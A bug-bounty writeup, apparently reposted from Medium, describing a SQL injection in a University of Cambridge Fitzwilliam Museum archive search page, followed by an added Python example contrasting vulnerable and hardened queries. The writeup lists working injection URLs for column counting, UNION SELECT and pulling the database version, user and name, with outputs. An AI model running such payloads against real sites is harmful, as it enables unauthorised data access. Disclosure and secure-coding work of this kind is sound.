SQLi in University of Cambridge

medium.com · devanshbatham/Awesome-Bugbounty-Writeups · 17 hours ago · bug-bounty
AI Summary

A researcher discovered and exploited a SQL injection vulnerability in the University of Cambridge's Fitzwilliam Museum search functionality, demonstrating column enumeration via ORDER BY, UNION SELECT attacks, and successful extraction of database version, user credentials, and database name.

Entities: University of Cambridge, Adesh Kolte, Fitzwilliam Museum, MySQL 5.1.39
SQL Injection Vulnerability In University Of Cambridge | by Adesh Kolte

~4 min read · August 24, 2018 (Updated: August 24, 2018)

Introduction Of Author:

I am Adesh Nandkishor Kolte, an independent security researcher from India. I found a SQL injection vulnerability in the University of Cambridge.

SQL injection is the most prevalent and most dangerous of web application vulnerabilities. With a SQLi vulnerability in the application, an attacker may cause severe damage such as bypassing logins, retrieving sensitive information, and modifying or deleting data. Sometimes this costs lives when it comes to the healthcare and banking domains.

Introduction apart, the objective of this article is to exploit the flaw and read some sensitive data from the database. If you don't know what exactly SQLi is, read my other article, which may throw some light on it. I am splitting the subject into two parts; having everything in one might make you lose interest.

Identifying the vulnerable site!

I tried the most basic check for SQL injection by inserting an apostrophe (') in the username field, leaving the password field empty and trying to log in. After a few attempts this website gave me a SQL error which looked something like this.

Now, let's get started. Launch your target and select SQL Injection GET/Search.

Our Target URL:
https://www.hki.fitzmuseum.cam.ac.uk/archives/winsor-and-newton/search.php?pid=Search&s_arg=Boutin&opt[]=named_individuals_sum '

Fixing The Error

So I tried some tricks to fix the error that occurred when I entered the single quote ('), like these:

https://www.hki.fitzmuseum.cam.ac.uk/archives/winsor-and-newton/search.php?pid=Search&s_arg=Boutin&opt[]=named_individuals_sum ' -- +
https://www.hki.fitzmuseum.cam.ac.uk/archives/winsor-and-newton/search.php?pid=Search&s_arg=Boutin&opt[]=named_individuals_sum ' -- -
https://www.hki.fitzmuseum.cam.ac.uk/archives/winsor-and-newton/search.php?pid=Search&s_arg=Boutin&opt[]='named_individuals_sum ' -- + (worked :) fixed the error)

Finding Columns Using Order By or Group By

Order By clause in MySQL: the SQL ORDER BY clause is used to sort the data in ascending or descending order, based on one or more columns. Some databases sort the query results in ascending order by default.

Group By clause in MySQL: the SQL GROUP BY clause is used together with the SELECT statement to arrange identical data into groups. The GROUP BY clause follows the WHERE clause in a SELECT statement and precedes the ORDER BY clause.

For finding the column count here I used the ORDER BY clause:

https://www.hki.fitzmuseum.cam.ac.uk/archives/winsor-and-newton/search.php?pid=Search&s_arg=Boutin&opt[]='named_individuals_sum ' order by 16 -- +

So I tried order by 15 -- + here:

https://www.hki.fitzmuseum.cam.ac.uk/archives/winsor-and-newton/search.php?pid=Search&s_arg=Boutin&opt[]='named_individuals_sum ' order by 15 -- +

The site loaded normally, so this website has 15 columns.

Finding Vulnerable Column From 15 Columns

For finding the vulnerable column I have to use the MySQL keyword UNION SELECT.

What is the use of the Union clause in MySQL? The SQL UNION clause/operator is used to combine the results of two or more SELECT statements without returning any duplicate rows.

What is a SELECT statement? The SQL SELECT statement is used to fetch data from a database table; it returns this data in the form of a result table. These result tables are called result-sets.

Syntax

The basic syntax of the UNION SELECT statement is as follows:

UNION SELECT column1, column2, columnN FROM table_name;

http://webapps.fitzmuseum.cam.ac.uk/wn/search.php?pid=Search&s_arg=Boutin&opt[]='named_individuals_sum' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--+

Getting Required Data

Finding Version, User and Database name: SQL provides functions for that, for example version(), user() and database().

Version()
http://webapps.fitzmuseum.cam.ac.uk/wn/search.php?pid=Search&s_arg=Boutin&opt[]=%27named_individuals_sum%27%20union%20select%201,version(),3,4,5,6,7,8,9,10,11,12,13,14,15--+
Output: 5.1.39-community

User()
http://webapps.fitzmuseum.cam.ac.uk/wn/search.php?pid=Search&s_arg=Boutin&opt[]=%27named_individuals_sum%27%20union%20select%201,user(),3,4,5,6,7,8,9,10,11,12,13,14,15--+
Output: [email protected]

Database()
http://webapps.fitzmuseum.cam.ac.uk/wn/search.php?pid=Search&s_arg=Boutin&opt[]=%27named_individuals_sum%27%20union%20select%201,database(),3,4,5,6,7,8,9,10,11,12,13,14,15--+
Output: wn_index

Video Demonstration: https://youtu.be/tK88xAwuF2w

I reported it last week and the vulnerability was fixed :)

I hope you like the article. Thanks for reading and happy hunting :)

#programming #infosec #cybersecurity #bug-bounty
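To show the defect class behind this post and what the fix looks like, here is an added example (not the author's code or the museum's application) using Python's sqlite3 with an in-memory table whose names are assumed: a search function that splices opt[] and s_arg into the statement text beside one that allow-lists the column name and binds the search term. The union payload is the post's own shape, reduced to this table's two result columns and SQLite's sqlite_version() in place of MySQL's version().

```python
import sqlite3

# Constructed in-memory stand-in for the archive's search table. The table and
# column names are assumptions for this demo, not the museum's real schema.
db = sqlite3.connect(":memory:")
db.executescript("""
    CREATE TABLE records (id INTEGER PRIMARY KEY, title TEXT,
                          named_individuals_sum TEXT);
    INSERT INTO records VALUES (1, 'Letter from Boutin', 'Boutin');
    INSERT INTO records VALUES (2, 'Catalogue note', 'Winsor');
""")

# The only search fields a caller may name in opt[]; anything else is rejected.
ALLOWED_OPT = {"named_individuals_sum", "title"}


def search_vulnerable(s_arg: str, opt: str) -> list:
    # Same defect class as the writeup: both request values are spliced into
    # the statement text, so a quote in opt[] closes the expression and the
    # rest of the value is executed as SQL (a UNION, as in the post).
    sql = f"SELECT id, title FROM records WHERE {opt} LIKE '%{s_arg}%'"
    return db.execute(sql).fetchall()


def search_hardened(s_arg: str, opt: str) -> list:
    # A column name cannot be bound as a parameter, so opt[] is checked against
    # an allow-list of known fields; the free-text term is bound with '?', so
    # quotes and comment markers in it are data, never SQL.
    if opt not in ALLOWED_OPT:
        raise ValueError(f"unsupported search field: {opt!r}")
    sql = f"SELECT id, title FROM records WHERE {opt} LIKE ?"
    return db.execute(sql, (f"%{s_arg}%",)).fetchall()


def hardened_rejects(s_arg: str, opt: str) -> bool:
    # True when the hardened search refuses the opt[] value outright.
    try:
        search_hardened(s_arg, opt)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    # The post's opt[] shape, reduced to this table's two result columns and
    # SQLite's version function. The trailing '-- ' comments out the LIKE.
    payload = "'named_individuals_sum' union select 1, sqlite_version()-- "
    print("vulnerable:", search_vulnerable("Boutin", payload))  # leaks version
    print("hardened:  ", hardened_rejects("Boutin", payload))   # True
    print("normal:    ", search_hardened("Boutin", "named_individuals_sum"))
```

The allow-list is the essential part: prepared statements alone would not have helped here, because the injected value is a column selector, not a data value.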